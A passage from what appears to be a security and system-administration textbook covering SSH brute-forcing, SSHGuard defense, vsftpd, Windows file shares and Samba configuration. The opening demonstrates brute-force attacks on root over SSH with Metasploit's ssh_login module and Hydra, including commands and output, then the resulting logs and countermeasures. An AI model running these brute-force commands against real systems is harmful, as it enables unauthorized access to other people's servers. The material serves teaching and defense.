Rank: Normal

Provided by:

todb <>

Basic options:

Name Current Setting Required Description

---- --------------- -------- -----------

BLANK_PASSWORDS false no Try blank passwords for all users

BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5

DB_ALL_CREDS false no Try each user/password couple stored in the current database

DB_ALL_PASS false no Add all passwords in the current database to the list

DB_ALL_USERS false no Add all users in the current database to the list

PASSWORD no A specific password to authenticate with

PASS_FILE no File containing passwords, one per line

RHOSTS yes The target address range or CIDR identifier

RPORT 22 yes The target port

STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host

THREADS 1 yes The number of concurrent threads

USERNAME no A specific username to authenticate as

USERPASS_FILE no File containing users and passwords separated by space, one pair per line

USER_AS_PASS false no Try the username as the password for all users

USER_FILE no File containing usernames, one per line

VERBOSE true yes Whether to print output for all attempts


This module will test ssh logins on a range of machines and report

successful logins. If you have loaded a database plugin and

connected to a database this module will record successful logins

and hosts so you can track your access.


msf auxiliary(ssh_login) > set pass_file /usr/share/wordlists/metasploit-jtr/password.lst

pass_file => /usr/share/wordlists/metasploit-jtr/password.lst

msf auxiliary(ssh_login) > set username root

username => root

msf auxiliary(ssh_login) > set verbose false

verbose => false

msf auxiliary(ssh_login) > set rhosts

rhosts =>

msf auxiliary(ssh_login) > exploit

[*] SSH - Starting bruteforce

Here the attacker has started a brute force attack against the SSH server at using the wordlist /usr/share/wordlists/metasploit-jtr/password.lst discussed in Chapter 7.

Another option is the stand-alone program Hydra. To use Hydra, use a command like

root@kali:∼# hydra -t10 -l root -P /usr/share/wordlists/metasploit-jtr/password.lst ssh

Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra ( ) starting at 2014-10-26 18:25:30

[DATA] 10 tasks, 1 server, 88396 login tries (l:1/p:88396), ∼8839 tries per task

[DATA] attacking service ssh on port 22

[STATUS] 160.00 tries/min, 160 tries in 00:01h, 88236 todo in 09:12h, 10 active

[STATUS] 160.00 tries/min, 480 tries in 00:03h, 87916 todo in 09:10h, 10 active

[STATUS] 149.57 tries/min, 1047 tries in 00:07h, 87349 todo in 09:44h, 10 active

[STATUS] 150.47 tries/min, 2257 tries in 00:15h, 86139 todo in 09:33h, 10 active

... Output Deleted ...

The -t flag specifies the number of threads to use; 10 in this case. The -l flag specifies the remote user name; to pass more than one user specify a file name of usernames with the -L flag instead. The -P flag is a list of passwords; this is the same password file used in the Metasploit attack. The command line continues with the IP address of the target and the authentication method, ssh in this case. Hydra can be used to perform brute force attacks against a range of protocols including SSH, SMB, FTP, and HTTP.

This attack is even slower than direct attacks against a Windows server. In Chapter 7 that attack was able to make 50 guesses per second of a remote Windows domain controller. This approach tried roughly 150—160 guesses per minute—less than 3 guesses per second.

Brute force attacks are detectable in the system logs. Indeed, the log file /var/log/secure on the target host reads

Oct 26 18:25:30 alnitak sshd[3288]: Connection from port 47303

Oct 26 18:25:30 alnitak sshd[3289]: Connection from port 47304

Oct 26 18:25:30 alnitak sshd[3290]: Connection from port 47305

Oct 26 18:25:30 alnitak sshd[3291]: Connection from port 47306

Oct 26 18:25:30 alnitak sshd[3292]: Connection from port 47307

Oct 26 18:25:30 alnitak sshd[3293]: Connection from port 47308

Oct 26 18:25:30 alnitak sshd[3300]: Connection from port 47310

Oct 26 18:25:30 alnitak sshd[3301]: Connection from port 47311

Oct 26 18:25:30 alnitak sshd[3302]: Connection from port 47312

Oct 26 18:25:30 alnitak sshd[3294]: Connection from port 47309

Oct 26 18:25:34 alnitak sshd[3288]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root

Oct 26 18:25:34 alnitak sshd[3289]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root

Oct 26 18:25:34 alnitak sshd[3290]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root

Oct 26 18:25:34 alnitak sshd[3291]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root

Oct 26 18:25:34 alnitak sshd[3292]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root

Oct 26 18:25:34 alnitak sshd[3293]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root

Oct 26 18:25:34 alnitak sshd[3300]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root

Oct 26 18:25:34 alnitak sshd[3301]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root

Oct 26 18:25:34 alnitak sshd[3302]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root

Oct 26 18:25:34 alnitak sshd[3294]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root

Oct 26 18:25:36 alnitak sshd[3288]: Failed password for root from port 47303 ssh2

Oct 26 18:25:36 alnitak sshd[3289]: Failed password for root from port 47304 ssh2

Oct 26 18:25:36 alnitak sshd[3291]: Failed password for root from port 47306 ssh2

Oct 26 18:25:36 alnitak sshd[3292]: Failed password for root from port 47307 ssh2

Oct 26 18:25:36 alnitak sshd[3293]: Failed password for root from port 47308 ssh2

Oct 26 18:25:36 alnitak sshd[3300]: Failed password for root from port 47310 ssh2

Oct 26 18:25:36 alnitak sshd[3301]: Failed password for root from port 47311 ssh2

Oct 26 18:25:36 alnitak sshd[3302]: Failed password for root from port 47312 ssh2

Oct 26 18:25:36 alnitak sshd[3294]: Failed password for root from port 47309 ssh2

Oct 26 18:25:36 alnitak sshd[3290]: Failed password for root from port 47305 ssh2

Oct 26 18:25:38 alnitak sshd[3288]: Failed password for root from port 47303 ssh2

Oct 26 18:25:38 alnitak sshd[3289]: Failed password for root from port 47304 ssh2

Oct 26 18:25:38 alnitak sshd[3291]: Failed password for root from port 47306 ssh2

Oct 26 18:25:38 alnitak sshd[3292]: Failed password for root from port 47307 ssh2

Oct 26 18:25:38 alnitak sshd[3293]: Failed password for root from port 47308 ssh2

Oct 26 18:25:38 alnitak sshd[3300]: Failed password for root from port 47310 ssh2

Oct 26 18:25:38 alnitak sshd[3301]: Failed password for root from port 47311 ssh2

The attack begins at 18:25:30, when 10 different connections are made from the attacker, matching the number of threads selected by the attacker. Next are the first 10 failed authentication attempts; this is followed by a large sequence of failed logon attempts.

Following just one session, say with PID 3289, shows the process.

[root@alnitak log]# grep 3289 /var/log/secure

Oct 26 18:25:30 alnitak sshd[3289]: Connection from port 47304

Oct 26 18:25:34 alnitak sshd[3289]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root

Oct 26 18:25:36 alnitak sshd[3289]: Failed password for root from port 47304 ssh2

Oct 26 18:25:38 alnitak sshd[3289]: Failed password for root from port 47304 ssh2

Oct 26 18:25:40 alnitak sshd[3289]: Failed password for root from port 47304 ssh2

Oct 26 18:25:42 alnitak sshd[3289]: Failed password for root from port 47304 ssh2

Oct 26 18:25:44 alnitak sshd[3289]: Failed password for root from port 47304 ssh2

Oct 26 18:25:46 alnitak sshd[3289]: Failed password for root from port 47304 ssh2

Oct 26 18:25:48 alnitak sshd[3289]: Failed password for root from port 47304 ssh2

Oct 26 18:25:48 alnitak sshd[3289]: PAM 6 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root

Oct 26 18:25:48 alnitak sshd[3289]: PAM service(sshd) ignoring max retries; 7 > 3

This particular OpenSSH server session received requests roughly every two seconds, but eventually closed the session due to too many failures. This forces the attacker to reconnect and begin the process again.

Oct 26 18:25:58 alnitak sshd[3309]: Connection from port 47313

Note the new PID.

Securing SSH

OpenSSH can be configured to allow or deny access to particular users through the configuration directives AllowUsers and DenyUsers. If a DenyUsers directive is present, then any listed user is unable to log in via SSH, regardless of other directives (including AllowUsers). If an AllowUsers directive is present, then no user not expressly permitted is allowed to log in. Consider the directive

AllowUsers sgermain

This allows SSH access only by sgermain; other users, including root are not permitted to login via SSH. Such failed login attempts are noted in the log with a message in the form

Nov 7 15:30:06 Spica sshd[3849]: Failed password for invalid user root from port 60325 ssh2

OpenSSH can also grant or restrict access to users based on their group membership through the AllowGroups and DenyGroups directives. Members of a group listed in DenyGroups cannot log in unless overridden by AllowUsers. If an AllowGroups directive is present, then no user not expressly permitted is allowed to log in.

OpenSSH respects TCP wrappers. If a service and host combination is in the file /etc/hosts.allow, then access to the service is granted. If the combination is not in /etc/hosts.allow, then /etc/hosts.deny is checked; if the service and host combination matches then access is denied. If neither has occurred, then access is granted. Each line in either hosts.allow or hosts.deny has the form

service : host(s)

The service is the name of the daemon; it must have been explicitly compiled to respect TCP wrappers. The host(s) can be specified by name, by IP address, or by IP Address Range. Multiple hosts can be separated by commas.

Suppose a user wants to allow SSH from only the hosts and; then configure hosts.allow as

# /etc/hosts.allow

sshd :,

Configure hosts.deny as

# /etc/hosts.deny

sshd: ALL

Then any SSH connection attempt from other than or will be refused before even attempting to authenticate the user.

Changes in hosts.allow and hosts.deny take effect immediately.

An administrator does not have to allow an attacker the ability to perform brute force attacks against OpenSSH. One tool to prevent such attacks is SSHGuard ( ). SSHGuard can be used to protect a range of services from brute force attacks, including OpenSSH. It does so by automatically including block rules, either in the system’s firewall or by using TCP Wrappers. Suppose that the administrator of the CentOS 5.8 system alnitak of the previous example wants to prevent OpenSSH brute force attacks. The first step is to download the SSHGuard source code from and uncompress it in /usr/local/src

[root@alnitak ∼]# tar -xjvf ./sshguard-1.5.tar.bz2 –C /usr/local/src

[root@alnitak ∼]# cd /usr/local/src/sshguard-1.5

To compile SSHGuard to use TCP wrappers as its back-end blocking mechanism, specify the firewall as hosts during configuration

[root@alnitak sshguard-1.5]# ./configure --with-firewall=hosts

Compile the program using make and make install

[root@alnitak sshguard-1.5]# make

[root@alnitak sshguard-1.5]# make install

The resulting binary is stored in /usr/local/sbin/sshguard; running it with the -h flag shows the available options

[root@alnitak sshguard-1.5]# /usr/local/sbin/sshguard -h


sshguard [-b <thr:file>] [-w <whlst>]{0,n} [-a num] [-p sec] [-s sec]

[-l <source>] [-f <srv:pidfile>]{0,n} [-i <pidfile>] [-v]

-b Blacklist: thr = number of abuses before blacklisting, file = blacklist filename.

-a Number of hits after which blocking an address (40)

-p Seconds after which unblocking a blocked address (420)

-w Whitelisting of addr/host/block, or take from file if starts with "/" or "." (repeatable)

-s Seconds after which forgetting about a cracker candidate (1200)

-l Add the given log source to Log Sucker’s monitored sources (off)

-f "authenticate" service’s logs through its process pid, as in pidfile

-i When started, save PID in the given file; useful for startup scripts (off)

-v Dump version message to stderr, supply this when reporting bugs

The SSHGUARD_DEBUG environment variable enables debugging mode (verbosity + interactivity).

Though the installation allows SSHGuard to be started from the command line, it is much preferable if it starts automatically at boot. The SSHGuard FAQ ( ) provides a reasonable starting point. Create the bash script /etc/init.d/sshguard with the content

File 9-2. The file /etc/init.d/sshguard on CentOS 5.8

#! /bin/sh

case $1 in


/usr/local/sbin/sshguard -l /var/log/secure -l /var/log/messages &



killall sshguard



echo "Use start or stop"

exit 1



This script tells SSHGuard to process the log files /var/log/messages and /var/log/secure and look for failed login attempts. To configure this initialization script to start on boot and stop when the system stops, add the links

[root@alnitak sshguard-1.5]# ln -s /etc/init.d/sshguard /etc/rc5.d/S99sshguard

[root@alnitak sshguard-1.5]# ln -s /etc/init.d/sshguard /etc/rc3.d/S99sshguard

[root@alnitak sshguard-1.5]# ln -s /etc/init.d/sshguard /etc/rc6.d/K01sshguard

[root@alnitak sshguard-1.5]# ln -s /etc/init.d/sshguard /etc/rc0.d/K01sshguard

When the system reboots, a check shows that SSHGuard is running.

[root@alnitak ∼]# ps aux | grep sshguard

root 2510 0.0 0.1 16728 1216 ? Sl 10:57 0:00 /usr/local/sbin/sshguard -l /var/log/secure -l /var/log/messages

root 2906 0.0 0.0 61236 724 pts/1 R+ 10:58 0:00 grep sshguard

If the attacker then attempts a brute force attack against the OpenSSH server, SSHGuard writes an entry in /etc/hosts.allow that denies further requests from that address

[root@alnitak ∼]# cat /etc/hosts.allow





# hosts.allow This file describes the names of the hosts which are

# allowed to use the local INET services, as decided

# by the ’/usr/sbin/tcpd’ server.


The block is not permanent; SSHGuard removes the block after a time if the brute force attacks cease. SSHGuard also notes the block in the system log

Feb 9 11:08:47 alnitak sshguard[2510]: Blocking for >630secs: 40 danger in 4 attacks over 0 seconds (all: 40d in 1 abuses over 0s).

The process on Ubuntu or Mint is similar. Modify the script /etc/init.d/sshguard to read the log files used by Ubuntu or Mint

File 9-3. The file /etc/init.d/sshguard on Mint or Ubuntu

#! /bin/sh

case $1 in


/usr/local/sbin/sshguard -l /var/log/syslog -l /var/log/auth.log &




killall sshguard



echo "Use start or stop"

exit 1



To configure it to start at the end of the boot sequence and stop at the start of the shutdown sequence, run

ghardy@dumbbell:/etc/init.d$ sudo update-rc.d sshguard defaults 98 02

[sudo] password for ghardy:

Adding system startup for /etc/init.d/sshguard ...

/etc/rc0.d/K02sshguard -> ../init.d/sshguard

/etc/rc1.d/K02sshguard -> ../init.d/sshguard

/etc/rc6.d/K02sshguard -> ../init.d/sshguard

/etc/rc2.d/S98sshguard -> ../init.d/sshguard

/etc/rc3.d/S98sshguard -> ../init.d/sshguard

/etc/rc4.d/S98sshguard -> ../init.d/sshguard

/etc/rc5.d/S98sshguard -> ../init.d/sshguard

In later versions of Ubuntu (11.04 and later), SSHGuard 1.5 is included in the universe repository; it can be installed with

enoether@procyon:∼$ sudo apt-get install sshguard

This installs SSHGuard, configures it, and sets it to start on boot. This version is compiled to block requests via iptables rather than via TCP wrappers. If a system is blocked, it appears in the sshguard chain in iptables; repeating the previous attack on an Ubuntu system with SSHGuard installed from package yields

enoether@procyon:∼$ sudo iptables -L

Chain INPUT (policy ACCEPT)

target prot opt source destination

sshguard all -- anywhere anywhere

Chain FORWARD (policy ACCEPT)

target prot opt source destination

Chain OUTPUT (policy ACCEPT)

target prot opt source destination

Chain sshguard (1 references)

target prot opt source destination

DROP all -- anywhere

FTP Servers

One kind of file server that remains in use, primarily for anonymous file transfers, are FTP servers. Although FTP servers can require user authentication, the credentials are passed in plain text, and so are trivially sniffed by an attacker. It is possible to configure FTP servers to run over SSL/TLS; this is called FTPS, and is different than SFTP, which runs over SSH.

All of the Linux distributions under consideration include a version of vsftpd that can be used to provide FTP service. The process of installing vsftpd depends on the distribution:

· CentOS: yum install vsftpd

· Mint / Ubuntu: sudo apt-get install vsftpd

· OpenSuSE: zypper install vsftpd

Once installed, the service is controlled via the service stop/start/restart command set, and is configured to start on boot using the same distribution specific tools used for OpenSSH.

The appropriate ports must also be opened in the firewall. However, FTP clients and servers can interact in different modes, called active and passive. A client initiates a session by connecting to the FTP server on TCP/21, the control port. In an active mode connection, when the client requests data from the server, they specify a local TCP port, which the client then opens. The server then makes a connection from TCP/20, the FTP data port, to the port specified by the client and sends the data. In passive mode, when the client makes a request of the server, the server specifies a local TCP port, which the server opens. The client then makes a request of the server on this newly opened port and the data is transferred. This structure makes configuring a firewall more complex; however, CentOS and OpenSuSE have defined templates for an FTP server in their graphical tool to manage their firewall. Neither Mint nor Ubuntu use a firewall by default.

The primary configuration file for vsftpd on Mint, OpenSuSE, or Ubuntu is /etc/vsftpd.conf, while on CentOS the file is /etc/vsftpd/vsftpd.conf. The settings in the configuration file are generally self-explanatory. The basic configuration for the server is handled in three directives (these are taken from OpenSuSE 11.4; other distributions organize the file differently).

# Allow anonymous FTP? (Beware - allowed by default if you comment this out).



# Uncomment this to allow local users to log in.



# Uncomment this to enable any form of FTP write command.


The first directive allows anonymous users access to the server. Note, there are no spaces on either side of the equals sign in directives. Some distributions allow anonymous access in their default configuration while others do not. The precise directory accessible to anonymous users depends on the distribution:

· CentOS: /var/ftp

· OpenSuSE, Mint 8-16, Ubuntu 9.10-13.10: /srv/ftp

· Mint 5-7, Ubuntu 8.04-9.04: /home/ftp

The local_enable directive allows local users the ability to log on by providing their username and password; as noted before these credentials are passed in plain text and provide an attack vector.

The write_enable directive allows users the ability to upload files to the server. By itself though, it does not allow anonymous users the ability to upload files; the destination directory must allow the ftp server to write files, and the variable anon_upload_enable must be set to yes.

Logging is handled by a different collection of directives.

# Log to the syslog daemon instead of using an logfile.



# Uncomment this to log all FTP requests and responses.



# Activate logging of uploads/downloads.



# You may override where the log file goes if you like. The default is shown

# below.



For most distributions, vsftpd was compiled with the necessary components to support the use of TCP wrappers. This can be verified by checking to see if the libwrap library is loaded by the executable

[root@Spica ∼]# ldd /usr/sbin/vsftpd | grep libwrap => /lib/ (0x005d7000)

Provided vsftpd is properly compiled, the use of TCP wrappers is enabled by the directive


Connecting to FTP Servers

Both Linux and Windows have command-line clients that can connect to FTP servers using essentially the same syntax. The open command opens a connection to the remote server. If the server accepts anonymous connections, then the user ftp (or anonymous) is permitted to connect without providing a password. The ls command can be used to determine what files are available for downloading, and they can be downloaded with the get command. Here is an example of a user on Windows 8 connecting to a remote server and downloading a file.


ftp> open tethys

Connected to tethys.corp.saturn.test.

220 (vsFTPd 2.0.5)

User (tethys.corp.saturn.test:(none)): ftp

331 Please specify the password.


230 Login successful.

ftp> help

Commands may be abbreviated. Commands are:

! delete literal prompt send

? debug ls put status

append dir mdelete pwd trace

ascii disconnect mdir quit type

bell get mget quote user

binary glob mkdir recv verbose

bye hash mls remotehelp

cd help mput rename

close lcd open rmdir

ftp> ls

200 PORT command successful. Consider using PASV.

150 Here comes the directory listing.




226 Directory send OK.

ftp: 38 bytes received in 0.00Seconds 38000.00Kbytes/sec.


ftp> get Testfile.txt

200 PORT command successful. Consider using PASV.

150 Opening BINARY mode data connection for Testfile.txt (23 bytes).

226 File send OK.

ftp: 23 bytes received in 0.00Seconds 23000.00Kbytes/sec.


It is also possible to access an FTP server by connecting to it through a browser (Figure 9-9).


Figure 9-9.

Connecting to an FTP server using Internet Explorer 10 from Windows 8

Windows File Sharing

Microsoft Windows operating systems are designed to allow users to share files and folders. A user on a domain workstation can share a folder with other domain members. Right-click on the folder, and select the Sharing tab (Figure 9-10). From the dialog box, select which users can access the shared folder and set their degree of access. Permissions can be granted instead to user groups, but not to organizational units (OUs).


Figure 9-10.

Simple Windows Sharing on Windows 8. Left: The Sharing Tab for a Folder. Right: Selecting Users

Users access the shared folder by navigating to the shared folder in, for example, the address bar for Windows Explorer. In the example shown in Figure 9-10, the address is \\epimetheus\Users\pkarrer\Desktop\Company Docs.

In most large organizations however, file shares are provided centrally as part of the overall network infrastructure and run from one or more file servers. To configure a Windows Server to act as a File Server, it must first be given the File Server Role. The process is similar to the process described in Chapter 6 to install Active Directory Services, and varies between Windows Server 2012 and Windows Server 2008.

Windows Server 2012

On Windows Server 2012 or 2012 R2, from Server Manager, select Add Roles and Features to start the Add Roles and Features Wizard (Figure 9-11). The Wizard begins by prompting the user to select the installation type; select Role-based or feature-based installation. Next, the user selects a server. From Server Roles, expand File and Storage Services, then expand File and iSCSI Services. Select File Server and File Server Resource Manager. No additional features are required to complete the installation.


Figure 9-11.

Adding the File Server Role to Windows Server 2012

Once the installation completes, the user is able to share directories on the file server. To create a shared directory, from Server Manager select File and Storage Services, then select Shares and start the New Share Wizard (Figure 9-12). Two kinds of shares are available: SMB shares, which are a Windows standard, and NFS shares, which are an older Unix/Linux standard.


Figure 9-12.

Setting the Name of a Share in the New Share Wizard on Windows Server 2012

Select SMB Share – Quick. The first step is to select the server and volume to host the shared directory. The default is the current server, in the directory c:\Shares. Next, select a name for the share, say “CommonShare.”

Other settings include the ability to prevent users without permissions on a share from even seeing its presence, encrypting access to the share, and allowing caching of the share.

Next, the user selects the permissions that govern access to the share. There are two different sets of permissions that apply to a shared folder: access permissions, which follow from the permissions on the file system; and share permissions, which apply to shared access to the file share. To see the difference, from the Permissions page in the Wizard, select Customize permissions (Figure 9-13). Four tabs appear: Permissions, Share, Auditing, and Effective Access.


Figure 9-13.

Effective Access for a File Share, from Windows Server 2012

The permissions tab configures access permissions. From the Permissions tab, select a principal and double-click. The user is presented with a list of basic permissions, including Read, Write, Read & Execute, Modify and others; advanced permissions include Read Attributes and Take Ownership.

The Share tab configures share permissions. From the Share tab, select a principal and double-click. The permissions list now only includes Full Control, Change, Read, and Special Permissions.

A user that tries to access the file share needs to be permitted by both sets of permissions. Select the Effective Access tab (Figure 9-13), and from User/Group select a user. The View effective access button does just that, and shows the net impact of the access permissions and the share permissions.

In the default configuration a domain user can read and write files in the common share, but cannot modify files created by a different user, nor can they delete a file created by another user. This behavior is controlled by file permissions, and can be modified by adding an appropriate set of permissions for domain users.

After the settings are confirmed, the share will be created and the required ports opened in the firewall.

Windows Server 2008

The process on Windows Server 2008 or 2008 R2 is similar. To install the needed components, either use Server Manager to navigate to Roles then select Add Roles, or use the Add Roles option from the Initial Configuration Tasks tool. From Server Roles select File Services, and when prompted include the role File Server Resource Manager. Complete the installation.

To add a share on Windows Server 2008, start by navigating Start ➤ Administrative Tools ➤ Share and Storage Management (Figure 9-14). From the action pane, select Provision Share; this launches the Provision a Shared Folder Wizard (Figure 9-15).


Figure 9-14.

Share and Storage Management on Windows Server 2008 R2


Figure 9-15.

Setting the SMB Permissions on a Shared Folder, Windows Server 2008 R2

The first step in the Wizard is to select the location for the shared directory, say C:\Shares\CommonShare. Next, the user is prompted to make any changes to the file system permissions. For this share to be accessible to all domain members, no changes are necessary. Next, the type of share is chosen; as before select the Windows native SMB.

The user is prompted to choose the SMB permissions for the share; these are the share permissions seen in Windows Server 2012. To allow all users the ability to access the share, including the ability to write to the share, these permissions need to be changed so that all users have Full Control. These are the same settings seen in Windows Server 2012, but it is not one of the default options.

Further options for the share include the quota policy, the file screen policy, and the DFS namespace publishing options. All of these can be left in their default state. Once the share is created, the required ports are automatically opened in the firewall.

Accessing Windows File Shares

Windows file shares can be accessed by directly navigating to the shared folder in Windows Explorer, say \\calypso\CommonShare. It is also possible, and occasionally convenient to map a file share to a drive letter. To do this from within Windows Explorer, navigate to the parent of the shared folder; if the share is \\calypso\CommonShare, then navigate to \\calypso. Right-click on the shared folder, then select Map Network Drive. Select a drive letter, and choose how to access the share.

It is possible to map a drive from the command line with the net use command. For example, to map the network drive \\calypso\CommonShare to the drive letter Z:, use the command

C:\Users\rkuhn>net use z: \\calypso\commonshare

The command completed successfully.



Volume in drive Z has no label.

Volume Serial Number is 0C78-1180

Directory of Z:\

10/27/2014 02:09 PM <DIR> .

10/27/2014 02:09 PM <DIR> ..

10/27/2014 02:09 PM 23 Second file.txt

10/27/2014 02:09 PM 14 Test.txt

2 File(s) 37 bytes

2 Dir(s) 18,674,470,912 bytes free

Drive mappings can be configured for users via group policy. On a domain controller, go to group policy management and create a new group policy object. Edit that policy by navigating User Configuration ➤ Preferences ➤ Windows Settings ➤ Drive Maps. In the Drive Maps window, right-click and select New ➤ Mapped Drive (Figure 9-16). For Action, select “Create”; for Location, select the file share created previously. Be sure that to include both the host name and the directory for the share. Select a label for the drive share; select a drive letter—say P. Apply the result.


Figure 9-16.

Configuring a Drive Mapping in Group Policy, in Windows Server 2012 R2

Once the group policy is created, apply it to one or more organizational units (OUs).

It is possible to access Windows file shares from Linux systems. For example, suppose a user is on an Ubuntu 12.10 system joined to the same domain as the file server. Launch the Ubuntu file browser, then navigate Browse Network ➤ Windows Network ➤ Domain Name ➤ Server Name ➤ Share Name to access the shared files (Figure 9-17).


Figure 9-17.

Accessing a Windows File Share from an Ubuntu 12.10 System Joined to the Same Domain

Other Linux distributions offer the same general feature, but the precise approach varies with the distribution (CentOS/Mint/OpenSuSE/Ubuntu) and the desktop interface (Cinnamon/Gnome/KDE/Unity).

Individual File Shares

Another use of file shares is to have a shared directory for each individual user. To create such a share, proceed as before and create a new share, say UserData located on the server at C:\Shares\UserData.

The primary difference in the share structure is in its permissions. The default file permissions settings allow all users read and execute access to the files in the shared folder; these permissions are inherited from the parent folder. If kept, this would mean users could read the files of other users; this is not the intent.

On Windows Server 2012, when setting permissions on the shared folder, select Customize permissions. On the permissions tab, press the Disable inheritance button, and convert all inherited permissions into explicit permissions. At this point, the folder retains the original file permissions that allow all users both read & execute permissions and special access on the directory. Remove these permissions.

On Windows Server 2008, when setting the NTFS permissions on the shared folder, edit the permissions (Figure 9-18). Press the advanced button, and uncheck the box that includes inheritable permissions, then add to convert them to explicit permissions. Remove the permissions that allow all users read & execute permissions and special access on the shared directory.


Figure 9-18.

Permissions on the Directory for Individual File Shares, from Windows Server 2008 R2

To enable a user to use the file share, change the location of their home folder. Select a user from Active Directory Users and Groups, then right-click to select properties (Figure 9-19). From the profile tab and Home folder, choose a drive letter, then connect it to the file share. To ensure that individual users’ files are contained in separate directories, use the user’s name to create unique subdirectories in the file share. This can be done with the macro %username%; if the file share is located at \\himalia\UserData, connect the home folder to \\himalia\UserData\%username%. When the user next logs on, the Z: drive will map to an individual directory on the file server.


Figure 9-19.

Changing the Home Folder Location for a User, on Windows Server 2008 R2

The process of manually editing the profile for a large number of users in this fashion is tedious; this can be scripted with PowerShell. Consider the following script.

Script 9-1. PowerShell script to set the home folder to a per-user file share for all users on a domain

Import-Module ActiveDirectory

$users = Get-ADUser -Filter *

foreach ($user in $users){

$baseshare = ’\\himalia\UserData’

$homeshare = $baseshare + ’\’ + $user.SamAccountName

New-Item $homeshare -type directory

$Acl = Get-ACL $baseshare # Use parent as base for ACL list

$Ar = New-Object ` ($user.SamAccountName,"FullControl","ContainerInherit,ObjectInherit","None","Allow")


Set-Acl $homeshare $Acl

Set-ADUser $user -HomeDrive ’Z’ -HomeDirectory $homeshare


The script begins by loading the Active Directory module; this is not needed on Windows Server 2012 or 2012 R2. The script gets a list of all of the users stored in Active Directory and loops through this list. It creates a new directory named after each user on the file server. Next, it sets the permissions on that directory; to the permissions for the parent directory it adds an access rule that gives the user full control over the directory and any folders created in it. With the permissions on the shared folder correctly set, the user’s home drive and home directory are set.

Samba Servers

Samba can be used on a Linux system to provide Windows file shares. In fact, Samba can also be used to share printers with Windows systems and even act as a domain controller. Such sophisticated use of Samba is beyond this book; the focus here is only on the simpler problem of configuring Samba to act as a stand-alone file Windows file server. In this example, Samba is configured to provide a common share for a group of users, and share each user’s home directory. Users of the file shares are configured to authenticate to the Samba file server itself, rather than to the domain controller.

There are two major versions of Samba, Samba 3, and Samba 4. Samba 4 was released in December 2012, and differs in significant ways from Samba 3. Because all of the distributions under consideration use a version of Samba 3 (exception: OpenSuSE 13.1) as their default, only Samba 3 is considered.

The installation method and control method for the Samba service vary slightly between distributions (Table 9-2). Samba uses two different daemons, nmbd, which responds to NetBIOS name requests, and smbd which provides file and printer services. CentOS controls both daemons with a single script, named smb, while OpenSuSE uses separate scripts. Ubuntu and Mint vary with the particular distribution; older distributions use a single script, while newer ones have separate scripts for each daemon.

Table 9-2.

Commands to Install and Control Samba, for Different Linux Distributions


Service Control


yum install samba

service smb status/start/stop/restart

Mint ≥ 9

sudo apt-get install samba

service smbd status/start/stop/restart

service nmbd status/start/stop/restart

Mint 6,7,8

sudo apt-get install samba

service samba status/start/stop/restart

Mint 5

sudo apt-get install samba

/etc/init.d/samba start/stop/restart

OpenSuSE ≤12.3

zypper install samba

service smb status/start/stop/restart

service nmb status/start/stop/restart

Ubuntu ≥10.04

sudo apt-get install samba samba-client

service smbd status/start/stop/restart

service nmbd status/start/stop/restart


8.10, 9.04, 9.10

sudo apt-get install samba samba-client

service samba status/start/stop/restart

Ubuntu 8.04

sudo apt-get install samba

/etc/init.d/samba start/stop/restart

To use Samba to share files, the appropriate ports must be opened in the firewall. These include the following:

· UDP/137 NetBIOS Name Service (nmbd)

· UDP/138 NetBIOS Datagram Service (nmbd)

· TCP/139 NetBIOS Session Service (smbd)

· TCP/445 SMB over TCP (smbd)

The primary configuration file for Samba is /etc/samba/smb.conf. Each of the distributions considered includes a default configuration file when Samba is installed, but unlike OpenSSH, these configuration files vary significantly between distributions. A sample elementary configuration file that shares a common directory and each user’s individual home directory has the following structure:

File 9-4. Sample Samba configuration file /etc/samba/smb.conf


security = user

passdb backend = tdbsam

workgroup = SCIENCE

server string = Samba Server Version %v

log file = /var/log/samba/log.%m

log level = 2

syslog = 1


comment = Common File Share for Authenticated Users

path = /srv/samba/CommonShare

browseable = yes

guest ok = no

read only = no

create mask = 0755


comment = Home Directories

browseable = no

read only = no

valid users = %S

Samba breaks up the configuration file into components separated by labels. The portion of the file after the label [global] contains directives that apply to all of Samba.

Samba can be run in a number of different modes, set by the value of the variable security in the configuration file. Allowable values include

· security = user In user level security, the client sends a username / password combination, and the server decides whether to accept the credentials.

· security = share Share level security has been deprecated. In this model the client sends only the password; Samba needs to know what user is intended.

· security = domain With domain level security, Samba acts as a domain member and uses a domain controller for authentication.

· security = ADS With ADS security, Samba also acts part of an active directory domain with authentication via Kerberos.

· security = server Server level security is deprecated, old, and no longer recommended for use.

Samba uses a password backend as part of its method to authenticate connections. Choices include the following:

· passdb backend = tdbsam Stored locally in a “trivial” database format.

· passdb backend = ldapsam Uses an LDAP server, which need not be local.

· passdb backend = smbpasswd A plain text file; not recommended.

To identify itself on the network, Samba sets workgroup name and a server string; in the example configuration, the variable %v is expanded out to the Samba version; this is the approach taken in the default CentOS configuration. Ubuntu 10.10, in contrast, uses the server string

server string = %h server (Samba, Ubuntu)

Here the variable %h is expanded to the server’s DNS host name.

Samba has two different methods for logging. The sample configuration file uses the directive

log file = /var/log/samba/log.%m

